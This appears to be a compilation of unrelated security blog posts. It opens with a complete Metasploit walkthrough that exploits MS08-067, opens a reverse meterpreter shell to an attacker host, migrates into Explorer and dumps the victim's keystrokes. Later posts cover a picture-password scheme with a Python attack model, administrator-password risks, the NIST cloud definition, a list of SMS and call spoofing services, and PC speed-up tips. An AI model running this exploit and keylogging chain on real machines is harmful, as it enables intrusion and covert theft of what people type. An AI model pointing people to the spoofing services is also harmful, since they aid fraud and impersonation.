Remote Keylogging with Backtrack

Remote Keylogging
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
This is a test of the keystroke logger <Comma> I am typing this inside of notepad.

PINoptic: A New Mobile Security Revolution!

What is PINoptic
How PINoptic Works
Instead of a PIN or password, you have an ordered series of pictures or icons that make up your 'picture story password'. When you are asked for it, many pictures or icons are displayed, each beside a symbol (alphanumeric characters, for instance), and you enter the symbols that sit beside the pictures of your story, in story order. The pictures and symbols are shuffled on every request, so what you type is a one-time response: someone who watches or records one entry cannot reuse it, which is the property that defeats simple shoulder surfing and replay.
Security is raised by requiring more symbols per entry. For example, a military-grade application would require five sets of symbols to be entered.
Initial research and confirmation of the concept has been completed by cognitive psychologists at the University of Sunderland; it suggests that very little additional cognitive load is placed on the end user compared with existing alphanumeric PIN and password systems.
For more information, leave a comment and we will reply.
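The page gives the idea but not PINoptic's parameters. The model below is an added example, not PINoptic's software: it assumes 30 pictures per challenge, digit labels and a four-picture story, implements the challenge, the user's response and the server check, and also shows the limit of the shoulder-surfing property that a practitioner should know about: a single observed entry reveals nothing usable, but an observer who records several entries can intersect the candidate pictures for each story position and recover the story.

```python
"""
Toy model of a picture-story one-time password (assumed parameters, not
PINoptic's real ones). The secret is an ordered list of pictures; every
challenge re-labels all pictures with random symbols and the user types
the symbols shown beside their pictures.
"""
import hmac
import random
import string
from typing import Dict, List, Optional, Set, Tuple

PICTURES = [f"pic{i:02d}" for i in range(30)]  # assumed: 30 icons per challenge
SYMBOLS = string.digits                         # assumed: icons are labelled 0-9
STORY_LENGTH = 4                                # assumed: a story is 4 pictures


def enrol(rng: random.Random) -> List[str]:
    """Pick the user's secret picture story (order matters)."""
    return rng.sample(PICTURES, STORY_LENGTH)


def make_challenge(rng: random.Random) -> Dict[str, str]:
    """Label every picture with a symbol; about three pictures share each digit."""
    return {p: rng.choice(SYMBOLS) for p in PICTURES}


def expected_response(challenge: Dict[str, str], story: List[str]) -> str:
    """The symbols the legitimate user types for this challenge."""
    return "".join(challenge[p] for p in story)


def verify(challenge: Dict[str, str], story: List[str], response: str) -> bool:
    """Server-side check; constant-time compare out of habit."""
    return hmac.compare_digest(expected_response(challenge, story), response)


def guess_probability(rounds: int = 1) -> float:
    """Chance that a blind guess passes `rounds` consecutive challenges."""
    return (1 / len(SYMBOLS)) ** (STORY_LENGTH * rounds)


def observer_candidates(challenge: Dict[str, str], response: str,
                        prior: Optional[List[Set[str]]] = None) -> List[Set[str]]:
    """What a shoulder surfer learns from one entry: for each story position,
    the pictures that carried the typed symbol, narrowed by earlier sightings."""
    out = []
    for i, sym in enumerate(response):
        matches = {p for p, s in challenge.items() if s == sym}
        if prior is not None:
            matches &= prior[i]
        out.append(matches)
    return out


def simulate(seed: int = 1, observed_rounds: int = 8
             ) -> Tuple[List[str], List[Set[str]], List[List[int]]]:
    """Run several logins watched by an observer; return the story, the
    observer's final candidate sets and the candidate counts per round."""
    rng = random.Random(seed)
    story = enrol(rng)
    prior = None
    history = []
    for _ in range(observed_rounds):
        challenge = make_challenge(rng)
        response = expected_response(challenge, story)
        assert verify(challenge, story, response)
        prior = observer_candidates(challenge, response, prior)
        history.append([len(s) for s in prior])
    return story, prior, history


def tamper_rejected(seed: int = 1) -> bool:
    """A response with one symbol changed must fail verification."""
    rng = random.Random(seed)
    story = enrol(rng)
    challenge = make_challenge(rng)
    good = expected_response(challenge, story)
    bad = str((int(good[0]) + 1) % 10) + good[1:]
    return not verify(challenge, story, bad)


if __name__ == "__main__":
    story, cands, history = simulate()
    print("story:", story)
    print("blind guess, 1 round: %.0e; 5 rounds: %.0e"
          % (guess_probability(1), guess_probability(5)))
    for n, counts in enumerate(history, 1):
        print(f"after {n} observed logins, candidates per position: {counts}")
```

With these parameters a blind guess succeeds once in 10^4 per round (10^20 for the page's five sets), but the candidate counts per position drop by roughly a factor of ten for every login the observer sees, so the scheme should be paired with the usual attempt limits and with rotation of the story if repeated observation is a realistic threat.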

Power Password : The Threat Inside

Most of us have heard the term "administrative passwords". These are the "Super Power Passwords" that sit behind every workstation: the password that, once you know it, gives you access to the network, the power to change anything and everything, and the ability to watch exactly what everyone is up to.
Behind every PC lies a Super Power Password; when you forget your own personal password you rely on an IT person to log you back on. One of the biggest concerns most organisations have is that they simply do not know how many people know the Super Power Password, and so the subject becomes a taboo.
So if you are the Chairman of a large corporation, everything you do can be watched and monitored by all those who know the Super Power Passwords. They will know:
  • How much the CEO is being paid
  • What his bonus is
  • What websites he’s visiting
  • Will be able to see his emails
  • Find out about his personal affairs
  • Know what’s happening to the share price way ahead of anyone else
In fact, every bit of confidential information that is communicated or stored on the network can be read by anyone who knows the Super Power Passwords, and they can indeed change or alter the entire course of the company.
A recent survey by Cyber-Ark into Super Power Passwords found that approximately one-half of all enterprises have more administrative passwords than individual ones, and that up to 42% of these super-powerful passwords are never changed. What is really worrying about these figures is that once you have the Super Power Password, the chances are that even if you leave the organisation you will still be able to access the system, because the password never gets changed.
Someone who wants to harm the company can do untold damage once inside the network with the Super Power Password. So next time you think of the IT people who do the techie stuff and little else, think again: they are really the big brother of your organisation. If this worries you, think seriously about managing your administrative passwords and put in the right practices and policies so that you know exactly who is in control, and so that the password is actually rotated when people leave.
In Microsoft Windows, to reset the local "Administrator" password:
  • Either: right-click on the "My Computer" icon, select "Manage", "Local Users and Groups", "Users", right-click on "Administrator" and choose "Set Password".
  • Or, for a CERN-managed client PC, go to the web page http://cern.ch/Win/operations/SetClientLocalAdminPassword (Change Local Administrator Password For a Client PC).

What are Clouds, and What is Cloud Computing?

The definition below is the US NIST working definition of cloud computing (Mell and Grance). Cloud computing is a model for enabling convenient, on-demand network access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. This cloud model promotes availability and is composed of five essential characteristics, three service models, and four deployment models.
Essential Characteristics:
On-demand self-service. A consumer can unilaterally provision computing capabilities, such as server time and network storage, as needed automatically without requiring human interaction with each service’s provider.
Broad network access. Capabilities are available over the network and accessed through standard mechanisms that promote use by heterogeneous thin or thick client platforms (e.g., mobile phones, laptops, and PDAs).
Resource pooling. The provider’s computing resources are pooled to serve multiple consumers using a multi-tenant model, with different physical and virtual resources dynamically assigned and reassigned according to consumer demand. There is a sense of location independence in that the customer generally has no control or knowledge over the exact location of the provided resources but may be able to specify location at a higher level of abstraction (e.g., country, state, or datacenter). Examples of resources include storage, processing, memory, network bandwidth, and virtual machines.
Rapid elasticity. Capabilities can be rapidly and elastically provisioned, in some cases automatically, to quickly scale out and rapidly released to quickly scale in. To the consumer, the capabilities available for provisioning often appear to be unlimited and can be purchased in any quantity at any time.
Measured Service. Cloud systems automatically control and optimize resource use by leveraging a metering capability at some level of abstraction appropriate to the type of service (e.g., storage, processing, bandwidth, and active user accounts). Resource usage can be monitored, controlled, and reported providing transparency for both the provider and consumer of the utilized service.
Service Models:
Cloud Software as a Service (SaaS). The capability provided to the consumer is to use the provider’s applications running on a cloud infrastructure. The applications are accessible from various client devices through a thin client interface such as a web browser (e.g., web-based email). The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings.
Cloud Platform as a Service (PaaS). The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly application hosting environment configurations.
Cloud Infrastructure as a Service (IaaS). The capability provided to the consumer is to provision processing, storage, networks, and other fundamental computing resources where the consumer is able to deploy and run arbitrary software, which can include operating systems and applications. The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, deployed applications, and possibly limited control of select networking components (e.g., host firewalls).
Deployment Models:
Private cloud. The cloud infrastructure is operated solely for an organization. It may be managed by the organization or a third party and may exist on premise or off premise.
Community cloud. The cloud infrastructure is shared by several organizations and supports a specific community that has shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be managed by the organizations or a third party and may exist on premise or off premise.
Public cloud. The cloud infrastructure is made available to the general public or a large industry group and is owned by an organization selling cloud services.
Hybrid cloud. The cloud infrastructure is a composition of two or more clouds (private, community, or public) that remain unique entities but are bound together by standardized or proprietary technology that enables data and application portability (e.g., cloud bursting for load-balancing between clouds).

Information Security: Call Spoofing and Smishing

I am not here to tell you the meaning of call spoofing or smishing.
Smishing: there are many sites from which you can send a fake SMS to anyone (if you pay a site for fake SMS, the payment record means you can be traced). This information is for educational purposes only.
The sites are given below:
www.fakemytext.com ; www.smsspoofing.com ; www.smstexter.com ; www.thesmszone.com
Smishing security / countermeasure: if you receive an SMS claiming to come from a bank or any other organisation, do not trust the sender shown, since it can be set to anything. Confirm with the organisation, using a phone number you already have rather than one given in the message, whether they actually sent it.
You can do call spoofing from these sites:
www.crazycall.net ; www.bluffmycall.com
Call spoofing security / countermeasure: there is no security against it; actually, I haven't found any. :) :P

Information Security: How to Make Your PC Faster

1. Use a registry cleaner: after a malware infection the registry is one of the parts of the operating system most likely to have been altered.
2. Defragment your hard drive: this is one of the troubleshooting steps almost everyone ignores, but after defragmenting, file data is stored contiguously, which makes it faster to read into RAM.
3. Scan for adware, spyware and viruses: always scan with an up-to-date antivirus once you start working.
4. Adjust the computer's visual effects.
5. Always clean the Windows temporary files: go to Start > Run, type %temp%, press Enter, select all files and delete them.
6. Increase virtual memory if required: My Computer > Properties > Advanced > Performance Settings > Advanced > Virtual memory > Change.
7. If your PC is still slow after all of these steps, add more RAM.